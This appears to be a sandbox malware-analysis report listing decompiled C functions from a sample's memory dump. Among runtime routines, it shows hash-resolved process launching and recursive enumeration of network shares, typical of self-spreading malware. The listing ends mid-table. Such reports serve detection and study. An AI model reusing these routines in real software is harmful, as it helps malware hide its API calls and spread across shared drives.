0x0042fbe4
0x0042fbec
0x0042fbf0
0x0042fbf1
0x0042fbf2
0x0042fbf7
0x0042fbfa
0x0042fbfd
0x00000000
0x00000000
0x0042fc04
0x0042fc0a
0x0042fc17
0x0042fc19
0x00000000
0x0042fc19
0x0042fbb9
0x0042fbbb
0x00000000
0x00000000
0x00000000
0x0042faf7
0x0042fb06
0x0042fb0c
0x0042fb0f
0x0042fb11
0x0042fb39
0x0042fb39
0x0042fb3c
0x0042fb3c
0x0042fb3c
0x0042fb3c
0x0042fb3e
0x0042fb4a
0x0042fb4a
0x0042fb4c
0x0042fb53
0x0042fb58
0x0042fb5b
0x0042fb5e
0x0042fb9b
0x0042fb9e
0x0042fba5
0x0042fba5
0x0042fbab
0x0042fbae
0x0042fb70
0x0042fb76
0x0042fb7c
0x0042fb89
0x0042fb8f
0x0042fc1c
0x0042fc1f
0x0042fc22
0x00000000
0x00000000
0x0042fc28
0x0042fc3c
0x0042fc3f
0x00000000
0x00000000
0x00000000
0x0042fc45
0x0042fb60
0x0042fb61
0x0042fb61
0x0042fb63
0x0042fb65
0x00000000
0x00000000
0x00000000
0x0042fb65
0x0042fb40
0x0042fb46
0x0042fb46
0x00000000
0x0042fb46
0x0042fb42
0x0042fb44
0x00000000
0x00000000
0x00000000
0x0042fb67
0x0042fb67
0x0042fb69
0x0042fb69
0x0042fb6d
0x0042fb6d
0x00000000
0x0042fb6d
0x0042fb18
0x00000000
0x0042fb18

APIs

Part of subcall function 0042C6B7: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,?,?,0042C8F9,00000000,00000000,00000000,00000002,00000000,00000001), ref: 0042C6F9
Part of subcall function 0042C6B7: GetLastError.KERNEL32(?,0042C8F9,00000000,00000000,00000000,00000002,00000000,00000001,00000000,?,0042CFB8,00000000,00425BFA,?,0043C368,00000010), ref: 0042C706

GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00000000,00000109,00000000,?,?,0042EAAA,00000109,00000000), ref: 0042FAFF
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000,00000109,00000000,?,?,0042EAAA,00000109,00000000), ref: 0042FB06

Part of subcall function 0042C826: GetConsoleMode.KERNEL32(00000000,?), ref: 0042C936
Part of subcall function 0042C826: GetConsoleCP.KERNEL32 ref: 0042C956
Part of subcall function 0042C826: WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00425BFA,00000005,00000000,00000000), ref: 0042CA46
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,00425BFA,00000000,?,00000000), ref: 0042CA6F
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,00425BFA,00000001,?,00000000), ref: 0042CAC8
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CC36
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CD10
Part of subcall function 0042C826: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0042CDE0
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042CE11
Part of subcall function 0042C826: GetLastError.KERNEL32 ref: 0042CE27
Part of subcall function 0042C826: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CE68
Part of subcall function 0042C826: GetLastError.KERNEL32(?,0042CFB8,00000000,00425BFA,?,0043C368,00000010,00426F28,00425BFA,00000000,00000001,00441D28,00000000,?), ref: 0042CE87

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,0042EAAA), ref: 0042FB82
HeapFree.KERNEL32(00000000), ref: 0042FB89
SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,0042EAAA), ref: 0042FBE4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,0042EAAA,00000109), ref: 0042FC11

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042ADA7, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 220

C-Code - Quality: 100%

			E0042ADA7(intOrPtr _a4, wchar_t* _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				wchar_t* _v12;
				wchar_t* _v16;
				wchar_t* _v20;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				wchar_t* _t52;
				intOrPtr* _t53;
				int _t56;
				wchar_t* _t57;
				wchar_t* _t58;
				wchar_t* _t59;
				signed int _t60;
				wchar_t* _t61;
				wchar_t* _t63;
				wchar_t* _t64;
				wchar_t* _t65;
				wchar_t* _t67;
				wchar_t* _t68;
				wchar_t* _t72;
				wchar_t* _t73;
				wchar_t* _t74;
				wchar_t* _t75;
				signed int _t79;
				wchar_t* _t82;
				signed int _t90;
				void* _t91;
				wchar_t* _t92;
				wchar_t* _t93;
				long* _t94;
				void* _t95;
				void* _t97;

				_t48 =  *0x441278; // 0x0
				_t92 = _a8;
				_v8 = _t48;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				while( *_t92 == 0x20) {
					_t92 =  &(_t92[0]);
					__eflags = _t92;
				}
				_t49 =  *_t92 & 0x0000ffff;
				if(_t49 == 0x61) {
					_t79 = 0x109;
					L10:
					_t8 =  &_v8;
					 *_t8 = _v8 | 0x00000002;
					__eflags =  *_t8;
					L11:
					_t93 =  &(_t92[0]);
					_t50 =  *_t93 & 0x0000ffff;
					_t82 = 1;
					__eflags = _t50;
					if(_t50 == 0) {
						while(1) {
							L66:
							__eflags =  *_t93 - 0x20;
							if( *_t93 != 0x20) {
								break;
							}
							_t93 =  &(_t93[0]);
							__eflags = _t93;
						}
						__eflags =  *_t93;
						if(__eflags == 0) {
							_t52 = E0042EECB( &_a8, _a4, _t79, _a12, 0x180);
							__eflags = _t52;
							if(_t52 == 0) {
								_t53 = _a16;
								 *0x440e58 =  &(( *0x440e58)[0]);
								__eflags =  *0x440e58;
								 *((intOrPtr*)(_t53 + 0xc)) = _v8;
								 *((intOrPtr*)(_t53 + 4)) = 0;
								 *_t53 = 0;
								 *((intOrPtr*)(_t53 + 8)) = 0;
								 *((intOrPtr*)(_t53 + 0x1c)) = 0;
								 *(_t53 + 0x10) = _a8;
								L72:
								return _t53;
							}
							L70:
							_t53 = 0;
							goto L72;
						}
						L68:
						 *((intOrPtr*)(E00427125(__eflags))) = 0x16;
						E004270D3();
						goto L70;
					}
					_t10 =  &(_t82[0x1f]); // 0x80
					_t90 = _t10;
					while(1) {
						__eflags = _t82;
						if(_t82 == 0) {
							break;
						}
						_t60 = _t50 & 0x0000ffff;
						__eflags = _t60 - 0x53;
						if(__eflags > 0) {
							_t61 = _t60 - 0x54;
							__eflags = _t61;
							if(_t61 == 0) {
								__eflags = 0x00001000 & _t79;
								if((0x00001000 & _t79) == 0) {
									_t79 = _t79 | 0x00001000;
									__eflags = _t79;
									L48:
									_t93 =  &(_t93[0]);
									_t50 =  *_t93 & 0x0000ffff;
									__eflags = _t50;
									if(_t50 != 0) {
										continue;
									}
									break;
								}
								L46:
								_t82 = 0;
								goto L48;
							}
							_t63 = _t61 - 0xe;
							__eflags = _t63;
							if(_t63 == 0) {
								__eflags = _t79 & 0x0000c000;
								if((_t79 & 0x0000c000) != 0) {
									goto L46;
								}
								_t79 = _t79 | 0x00008000;
								goto L48;
							}
							_t64 = _t63 - 1;
							__eflags = _t64;
							if(_t64 == 0) {
								__eflags = _v16;
								if(_v16 != 0) {
									goto L46;
								}
								_v8 = _v8 | 0x00004000;
								_v16 = 1;
								goto L48;
							}
							_t65 = _t64 - 0xb;
							__eflags = _t65;
							if(_t65 == 0) {
								__eflags = _v16;
								if(_v16 != 0) {
									goto L46;
								}
								_v8 = _v8 & 0xffffbfff;
								_v16 = 1;
								goto L48;
							}
							__eflags = _t65 - 6;
							if(__eflags != 0) {
								goto L68;
							}
							__eflags = _t79 & 0x0000c000;
							if((_t79 & 0x0000c000) != 0) {
								goto L46;
							}
							_t79 = _t79 | 0x00004000;
							goto L48;
						}
						if(__eflags == 0) {
							__eflags = _v12;
							if(_v12 != 0) {
								goto L46;
							}
							_v12 = 1;
							_t79 = _t79 | 0x00000020;
							goto L48;
						}
						_t67 = _t60 - 0x20;
						__eflags = _t67;
						if(_t67 == 0) {
							goto L48;
						}
						_t68 = _t67 - 0xb;
						__eflags = _t68;
						if(_t68 == 0) {
							__eflags = _t79 & 0x00000002;
							if((_t79 & 0x00000002) != 0) {
								goto L46;
							}
							_t79 = _t79 & 0xfffffffe | 0x00000002;
							_v8 = _v8 & 0xfffffffc | _t90;
							goto L48;
						}
						_t72 = _t68 - 1;
						__eflags = _t72;
						if(_t72 == 0) {
							_v20 = 1;
							goto L46;
						}
						_t73 = _t72 - 0x18;
						__eflags = _t73;
						if(_t73 == 0) {
							__eflags = _t79 & 0x00000040;
							if((_t79 & 0x00000040) != 0) {
								goto L46;
							}
							_t79 = _t79 | 0x00000040;
							goto L48;
						}
						_t74 = _t73 - 0xa;
						__eflags = _t74;
						if(_t74 == 0) {
							_t79 = _t79 | _t90;
							goto L48;
						}
						_t75 = _t74 - 4;
						__eflags = _t75;
						if(__eflags != 0) {
							goto L68;
						}
						__eflags = _v12 - _t75;
						if(_v12 != _t75) {
							goto L46;
						}
						_v12 = 1;
						_t79 = _t79 | 0x00000010;
						goto L48;
					}
					__eflags = _v20;
					if(_v20 == 0) {
						goto L66;
					}
					_t91 = 0x20;
					while(1) {
						__eflags =  *_t93 - _t91;
						if( *_t93 != _t91) {
							break;
						}
						_t93 =  &(_t93[0]);
						__eflags = _t93;
					}
					_t56 = wcsncmp("ccs", _t93, 3);
					_t97 = _t95 + 0xc;
					__eflags = _t56;
					if(__eflags != 0) {
						goto L68;
					}
					_t94 =  &(_t93[1]);
					while(1) {
						__eflags =  *_t94 - _t91;
						if( *_t94 != _t91) {
							break;
						}
						_t94 =  &(_t94[0]);
						__eflags = _t94;
					}
					__eflags =  *_t94 - 0x3d;
					if(__eflags != 0) {
						goto L68;
					} else {
						goto L58;
					}
					do {
						L58:
						_t94 =  &(_t94[0]);
						__eflags =  *_t94 - _t91;
					} while ( *_t94 == _t91);
					_t57 = E0042EFD0(_t94, L"UTF-8", 5);
					_t95 = _t97 + 0xc;
					__eflags = _t57;
					if(_t57 != 0) {
						_t58 = E0042EFD0(_t94, L"UTF-16LE", 8);
						_t95 = _t95 + 0xc;
						__eflags = _t58;
						if(_t58 != 0) {
							_t59 = E0042EFD0(_t94, L"UNICODE", 7);
							_t95 = _t95 + 0xc;
							__eflags = _t59;
							if(__eflags != 0) {
								goto L68;
							}
							_t93 =  &(_t94[3]);
							_t79 = _t79 | 0x00010000;
							goto L66;
						}
						_t93 =  &(_t94[4]);
						_t79 = _t79 | 0x00020000;
						goto L66;
					}
					_t93 =  &(_t94[2]);
					_t79 = _t79 | 0x00040000;
					goto L66;
				}
				if(_t49 == 0x72) {
					_t79 = 0;
					_v8 = _v8 | 0x00000001;
					goto L11;
				}
				_t101 = _t49 - 0x77;
				if(_t49 == 0x77) {
					_t79 = 0x301;
					goto L10;
				}
				 *((intOrPtr*)(E00427125(_t101))) = 0x16;
				E004270D3();
				return 0;
			}

0x0042adaf
0x0042adb8
0x0042adbb
0x0042adbe
0x0042adc1
0x0042adc4
0x0042adcc
0x0042adc9
0x0042adc9
0x0042adc9
0x0042add2
0x0042add8
0x0042ae0a
0x0042ae0f
0x0042ae0f
0x0042ae0f
0x0042ae0f
0x0042ae13
0x0042ae13
0x0042ae16
0x0042ae1b
0x0042ae1d
0x0042ae20
0x0042affc
0x0042affc
0x0042affc
0x0042b000
0x00000000
0x00000000
0x0042aff9
0x0042aff9
0x0042aff9
0x0042b004
0x0042b007
0x0042b02b
0x0042b033
0x0042b035
0x0042b03b
0x0042b03e
0x0042b03e
0x0042b047
0x0042b04d
0x0042b050
0x0042b052
0x0042b055
0x0042b058
0x0042b05b
0x00000000
0x0042b05b
0x0042b037
0x0042b037
0x00000000
0x0042b037
0x0042b009
0x0042b00e
0x0042b014
0x00000000
0x0042b014
0x0042ae26
0x0042ae26
0x0042ae2e
0x0042ae2e
0x0042ae30
0x00000000
0x00000000
0x0042ae36
0x0042ae39
0x0042ae3c
0x0042aed5
0x0042aed5
0x0042aed8
0x0042af39
0x0042af3b
0x0042af41
0x0042af41
0x0042af43
0x0042af43
0x0042af46
0x0042af49
0x0042af4c
0x00000000
0x00000000
0x00000000
0x0042af4c
0x0042af3d
0x0042af3d
0x00000000
0x0042af3d
0x0042aeda
0x0042aeda
0x0042aedd
0x0042af24
0x0042af2a
0x00000000
0x00000000
0x0042af2c
0x00000000
0x0042af2c
0x0042aedf
0x0042aedf
0x0042aee0
0x0042af12
0x0042af16
0x00000000
0x00000000
0x0042af18
0x0042af1b
0x00000000
0x0042af1b
0x0042aee2
0x0042aee2
0x0042aee5
0x0042aefc
0x0042af00
0x00000000
0x00000000
0x0042af02
0x0042af09
0x00000000
0x0042af09
0x0042aee7
0x0042aeea
0x00000000
0x00000000
0x0042aef0
0x0042aef6
0x00000000
0x00000000
0x0042aef8
0x00000000
0x0042aef8
0x0042ae42
0x0042aec3
0x0042aec7
0x00000000
0x00000000
0x0042aec9
0x0042aed0
0x00000000
0x0042aed0
0x0042ae44
0x0042ae44
0x0042ae47
0x00000000
0x00000000
0x0042ae4d
0x0042ae4d
0x0042ae50
0x0042aea4
0x0042aea7
0x00000000
0x00000000
0x0042aeb6
0x0042aebb
0x00000000
0x0042aebb
0x0042ae52
0x0042ae52
0x0042ae53
0x0042ae98
0x00000000
0x0042ae98
0x0042ae55
0x0042ae55
0x0042ae58
0x0042ae87
0x0042ae8a
0x00000000
0x00000000
0x0042ae90
0x00000000
0x0042ae90
0x0042ae5a
0x0042ae5a
0x0042ae5d
0x0042ae80
0x00000000
0x0042ae80
0x0042ae5f
0x0042ae5f
0x0042ae62
0x00000000
0x00000000
0x0042ae68
0x0042ae6b
0x00000000
0x00000000
0x0042ae71
0x0042ae78
0x00000000
0x0042ae78
0x0042af52
0x0042af56
0x00000000
0x00000000
0x0042af5e
0x0042af64
0x0042af64
0x0042af67
0x00000000
0x00000000
0x0042af61
0x0042af61
0x0042af61
0x0042af71
0x0042af76
0x0042af79
0x0042af7b
0x00000000
0x00000000
0x0042af81
0x0042af89
0x0042af89
0x0042af8c
0x00000000
0x00000000
0x0042af86
0x0042af86
0x0042af86
0x0042af8e
0x0042af92
0x00000000
0x00000000
0x00000000
0x00000000
0x0042af94
0x0042af94
0x0042af94
0x0042af97
0x0042af97
0x0042afa4
0x0042afa9
0x0042afac
0x0042afae
0x0042afc3
0x0042afc8
0x0042afcb
0x0042afcd
0x0042afe2
0x0042afe7
0x0042afea
0x0042afec
0x00000000
0x00000000
0x0042afee
0x0042aff1
0x00000000
0x0042aff1
0x0042afcf
0x0042afd2
0x00000000
0x0042afd2
0x0042afb0
0x0042afb3
0x00000000
0x0042afb3
0x0042addd
0x0042ae02
0x0042ae04
0x00000000
0x0042ae04
0x0042addf
0x0042ade2
0x0042adfb
0x00000000
0x0042adfb
0x0042ade9
0x0042adef
0x00000000

APIs

wcsncmp.NTDLL(ccs,?,00000003,00000000), ref: 0042AF71

Strings

ccs, xrefs: 0042AF6C
UTF-16LE, xrefs: 0042AFBD
UNICODE, xrefs: 0042AFDC
UTF-8, xrefs: 0042AF9E

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041EF90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63

C-Code - Quality: 58%

			E0041EF90(intOrPtr _a4) {
				char _v12;
				void* _v24;
				void* _v28;
				short _v56;
				intOrPtr _v60;
				char _v104;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr* _t23;

				_t14 =  *0x48223c; // 0x0
				_v12 = 0;
				if(_t14 != 0) {
					 *_t14( &_v12);
				}
				E0042D0A0( &_v104, 0, 0x44);
				_v56 = 0;
				_v60 = 1;
				_v104 = 0x44;
				_t17 = E00413000( &_v104, 0, 1, 0x46318ac7);
				 *_t17(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v104,  &_v28);
				WaitForSingleObject(_v28, 0x7530);
				CloseHandle(_v28);
				CloseHandle(_v24);
				Sleep(0x3e8);
				_t23 =  *0x482240; // 0x0
				if(_t23 != 0) {
					return  *_t23(_v12);
				}
				return _t23;
			}

0x0041ef98
0x0041ef9e
0x0041efa7
0x0041efad
0x0041efad
0x0041efb7
0x0041efc6
0x0041efca
0x0041efd1
0x0041efd8
0x0041effa
0x0041f005
0x0041f015
0x0041f01b
0x0041f022
0x0041f028
0x0041f02f
0x00000000
0x0041f035
0x0041f03b

APIs

WaitForSingleObject.KERNEL32(?,00007530), ref: 0041F005
CloseHandle.KERNEL32(?), ref: 0041F015
CloseHandle.KERNEL32(?), ref: 0041F01B
Sleep.KERNEL32(000003E8), ref: 0041F022

Strings

D, xrefs: 0041EFD1

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041EEE0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63

C-Code - Quality: 58%

			E0041EEE0(intOrPtr _a4) {
				char _v12;
				void* _v24;
				void* _v28;
				short _v56;
				intOrPtr _v60;
				char _v104;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr* _t23;

				_t14 =  *0x48223c; // 0x0
				_v12 = 0;
				if(_t14 != 0) {
					 *_t14( &_v12);
				}
				E0042D0A0( &_v104, 0, 0x44);
				_v56 = 0;
				_v60 = 1;
				_v104 = 0x44;
				_t17 = E00413000( &_v104, 0, 1, 0x46318ad1);
				 *_t17(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v104,  &_v28);
				WaitForSingleObject(_v28, 0x7530);
				CloseHandle(_v28);
				CloseHandle(_v24);
				Sleep(0x3e8);
				_t23 =  *0x482240; // 0x0
				if(_t23 != 0) {
					return  *_t23(_v12);
				}
				return _t23;
			}

0x0041eee8
0x0041eeee
0x0041eef7
0x0041eefd
0x0041eefd
0x0041ef07
0x0041ef16
0x0041ef1a
0x0041ef21
0x0041ef28
0x0041ef4a
0x0041ef55
0x0041ef65
0x0041ef6b
0x0041ef72
0x0041ef78
0x0041ef7f
0x00000000
0x0041ef85
0x0041ef8b

APIs

WaitForSingleObject.KERNEL32(?,00007530), ref: 0041EF55
CloseHandle.KERNEL32(?), ref: 0041EF65
CloseHandle.KERNEL32(?), ref: 0041EF6B
Sleep.KERNEL32(000003E8), ref: 0041EF72

Strings

D, xrefs: 0041EF21

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00413740, Relevance: 7.6, APIs: 5, Instructions: 96

C-Code - Quality: 96%

			E00413740(void* _a4) {
				int _v8;
				int _v12;
				void* _t20;
				signed int _t26;
				signed int _t29;
				void* _t37;
				void* _t50;
				intOrPtr* _t53;
				void* _t54;

				_v8 = 0x4000;
				_v12 = 0xffffffff;
				if(WNetOpenEnumW(2, 0, 0, _a4,  &_a4) == 0) {
					_t20 = GlobalAlloc(0x40, _v8);
					_t37 = _t20;
					if(_t37 != 0) {
						while(1) {
							E0042D0A0(_t37, 0, _v8);
							_t54 = _t54 + 0xc;
							if(WNetEnumResourceW(_a4,  &_v12, _t37,  &_v8) != 0) {
								break;
							}
							_t50 = 0;
							if(_v12 > 0) {
								_t11 = _t37 + 0x14; // 0x14
								_t53 = _t11;
								do {
									_t29 =  *0x462840; // 0x0
									if(_t29 <= 0x40 &&  *((intOrPtr*)(_t53 - 0x14)) == 2 &&  *((intOrPtr*)(_t53 - 0x10)) == 1) {
										E0042623B((_t29 << 0xb) + 0x442040, 0x400,  *_t53);
										_t54 = _t54 + 0xc;
										 *0x462840 =  *0x462840 + 1;
									}
									if(( *(_t53 - 8) & 0x00000002) == 2) {
										_t15 = _t53 - 0x14; // 0x0
										E00413740(_t15);
									}
									_t50 = _t50 + 1;
									_t53 = _t53 + 0x20;
								} while (_t50 < _v12);
							}
						}
						GlobalFree(_t37);
						_t26 = WNetCloseEnum(_a4);
						asm("sbb eax, eax");
						return  ~_t26 + 1;
					} else {
						return _t20;
					}
				} else {
					return 0;
				}
			}

0x00413756
0x0041375d
0x0041376c
0x0041377d
0x00413783
0x00413787
0x00413792
0x00413799
0x004137a1
0x004137b6
0x00000000
0x00000000
0x004137b8
0x004137bd
0x004137bf
0x004137bf
0x004137c2
0x004137c2
0x004137ca
0x004137e9
0x004137ee
0x004137f1
0x004137f1
0x00413800
0x00413802
0x00413806
0x00413806
0x0041380b
0x0041380c
0x0041380f
0x00413814
0x004137bd
0x0041381a
0x00413824
0x0041382d
0x00413835
0x00413789
0x0041378d
0x0041378d
0x0041376e
0x00413773
0x00413773

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00413764
GlobalAlloc.KERNEL32(00000040,00004000), ref: 0041377D
WNetEnumResourceW.MPR(FFFFFFFF,FFFFFFFF,00000000,00004000), ref: 004137AE
GlobalFree.KERNEL32(00000000), ref: 0041381A
WNetCloseEnum.MPR(FFFFFFFF), ref: 00413824

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042C614, Relevance: 7.6, APIs: 5, Instructions: 54

C-Code - Quality: 100%

			E0042C614() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t25;
				signed int _t34;

				_t14 =  *0x43f054; // 0xd46ffb00
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12);
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t22 = _v16 ^ _v20.LowPart;
					_t34 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t34 != 0xbb40e64e) {
						if((0xffff0000 & _t34) == 0) {
							_t22 = (_t34 | 0x00004711) << 0x10;
							_t34 = _t34 | _t22;
						}
					} else {
						_t34 = 0xbb40e64f;
					}
					 *0x43f054 = _t34;
					 *0x43f058 =  !_t34;
					return _t22;
				} else {
					_t25 =  !_t14;
					 *0x43f058 = _t25;
					return _t25;
				}
			}

0x0042c61c
0x0042c621
0x0042c625
0x0042c637
0x0042c64b
0x0042c657
0x0042c65f
0x0042c667
0x0042c673
0x0042c67c
0x0042c67f
0x0042c683
0x0042c68e
0x0042c697
0x0042c69a
0x0042c69a
0x0042c685
0x0042c685
0x0042c685
0x0042c69c
0x0042c6a4
0x00000000
0x0042c63d
0x0042c63d
0x0042c63f
0x00000000
0x0042c63f

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0042C64B
GetCurrentProcessId.KERNEL32 ref: 0042C657
GetCurrentThreadId.KERNEL32 ref: 0042C65F
GetTickCount.KERNEL32 ref: 0042C667
QueryPerformanceCounter.KERNEL32(?), ref: 0042C673

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00411420, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 183

C-Code - Quality: 56%

			E00411420(signed int*** _a4, signed char* _a8) {
				signed int _v8;
				signed int** _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* __edi;
				void* __esi;
				signed char _t52;
				void* _t54;
				intOrPtr _t55;
				signed int** _t56;
				signed int** _t60;
				signed int _t61;
				signed int _t64;
				char _t66;
				signed int _t67;
				signed int* _t68;
				signed int* _t73;
				void* _t75;
				signed char* _t76;
				signed int _t77;
				signed int*** _t82;
				signed int _t83;
				signed int* _t85;
				char* _t88;
				signed int _t89;
				signed int _t90;
				signed int _t92;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				intOrPtr* _t98;
				signed int** _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				signed int _t103;
				void* _t106;
				void* _t107;

				_t1 =  &_a8; // 0x414de4
				_t76 =  *_t1;
				_t101 = 0;
				_v8 = 0;
				if(_t76 == 0) {
					L10:
					return 0;
				}
				_t52 =  *_t76;
				if(_t52 == 0) {
					goto L10;
				} else {
					if(_t52 == 0x2d) {
						_t76 =  &(_t76[1]);
						_v8 = 1;
						_a8 = _t76;
					}
				}
				_t98 = __imp__isxdigit;
				_t54 =  *_t98( *_t76 & 0x000000ff);
				_t107 = _t106 + 4;
				if(_t54 != 0) {
					do {
						_t90 = ( &(_t76[1]))[_t101] & 0x000000ff;
						_t101 = _t101 + 1;
						_t75 =  *_t98(_t90);
						_t107 = _t107 + 4;
					} while (_t75 != 0);
				}
				_t82 = _a4;
				_t55 = _t101 + _v8;
				_t92 = 0;
				_v24 = _t55;
				if(_t82 == 0) {
					return _t55;
				} else {
					_t99 =  *_t82;
					if(_t99 != 0) {
						_v12 = _t99;
						if(_t99[2] < 1) {
							_t56 = E0040D6F0(_t99, 1);
							_t107 = _t107 + 4;
							_t92 = 0;
						} else {
							_t56 = _t99;
						}
						if(_t56 != _t92) {
							_t73 =  *_t99;
							_t99[3] = _t92;
							 *_t73 = _t92;
							_t73[1] = _t92;
							_t99[1] = _t92;
						}
					} else {
						_t99 = E0040D580();
						_v12 = _t99;
						if(_t99 == 0) {
							goto L10;
						}
					}
					asm("cdq");
					_t59 = 0x3f + _t101 * 4 + (_t92 & 0x0000003f) >> 6;
					if(0x3f + _t101 * 4 + (_t92 & 0x0000003f) >> 6 > _t99[2]) {
						_t60 = E0040D6F0(_t99, _t59);
					} else {
						_t60 = _t99;
					}
					if(_t60 != 0) {
						_t83 = 0;
						_t61 = _t101;
						_v20 = _t61;
						_v16 = 0;
						if(_t101 > 0) {
							while(1) {
								_t100 = 0x10;
								if(_t61 < 0x10) {
									_t100 = _t61;
								}
								_t96 = 0;
								_t103 = 0;
								_t88 = _t61 - _t100 + _t76;
								do {
									_t66 =  *_t88;
									_t24 = _t66 - 0x30; // -48
									_t77 = _t24;
									if(_t77 > 9) {
										_t25 = _t66 - 0x61; // -97
										if(_t25 > 5) {
											_t26 = _t66 - 0x41; // -65
											if(_t26 > 5) {
												_t67 = 0;
											} else {
												_t67 = _t66 + 0xffffffc9;
											}
										} else {
											_t67 = _t66 + 0xffffffa9;
										}
									} else {
										_t67 = _t77;
									}
									_t97 = _t96 << 4;
									asm("cdq");
									_t103 = (_t103 << 0x00000020 | _t96) << 0x4 | _t97;
									_t100 = _t100 - 1;
									_t88 = _t88 + 1;
									_t96 = _t97 | _t67;
								} while (_t100 > 0);
								_t31 =  &_v16; // 0x414de4
								_t89 =  *_t31;
								_t99 = _v12;
								_t68 =  *_t99;
								 *(_t68 + _t89 * 8) = _t96;
								 *(_t68 + 4 + _t89 * 8) = _t103;
								_t61 = _v20 - 0x10;
								_t83 = _t89 + 1;
								_v16 = _t83;
								_v20 = _t61;
								if(_t61 > 0) {
									_t23 =  &_a8; // 0x414de4
									_t76 =  *_t23;
									continue;
								}
								goto L38;
							}
						}
						L38:
						_t99[1] = _t83;
						_t102 = _t83;
						if(_t83 > 0) {
							_t43 = _t83 * 8; // -8
							_t85 =  *_t99 + _t43 - 8;
							while(1) {
								_t64 =  *_t85;
								_t95 = _t85[1];
								_t85 = _t85 - 8;
								if((_t64 | _t95) != 0) {
									break;
								}
								_t102 = _t102 - 1;
								if(_t102 > 0) {
									continue;
								}
								break;
							}
							_t99[1] = _t102;
						}
						_t99[3] = _v8;
						 *_a4 = _t99;
						return _v24;
					} else {
						if( *_a4 != 0) {
							goto L10;
						}
						E0040D4F0(_t99);
						return 0;
					}
				}
			}

0x00411429
0x00411429
0x0041142d
0x00411430
0x00411435
0x00411496
0x00000000
0x00411496
0x00411437
0x0041143b
0x00000000
0x0041143d
0x0041143f
0x00411441
0x00411442
0x00411449
0x00411449
0x0041143f
0x0041144f
0x00411456
0x00411458
0x0041145d
0x00411460
0x00411460
0x00411465
0x00411467
0x00411469
0x0041146c
0x00411460
0x00411473
0x00411476
0x00411479
0x0041147b
0x00411480
0x0041149e
0x00411482
0x00411482
0x00411486
0x004114a3
0x004114a6
0x004114ae
0x004114b3
0x004114b6
0x004114a8
0x004114a8
0x004114a8
0x004114ba
0x004114bc
0x004114be
0x004114c1
0x004114c3
0x004114c6
0x004114c6
0x00411488
0x0041148d
0x0041148f
0x00411494
0x00000000
0x00000000
0x00411494
0x004114d0
0x004114d6
0x004114dc
0x004114e3
0x004114de
0x004114de
0x004114de
0x004114ed
0x00411507
0x00411509
0x0041150b
0x0041150e
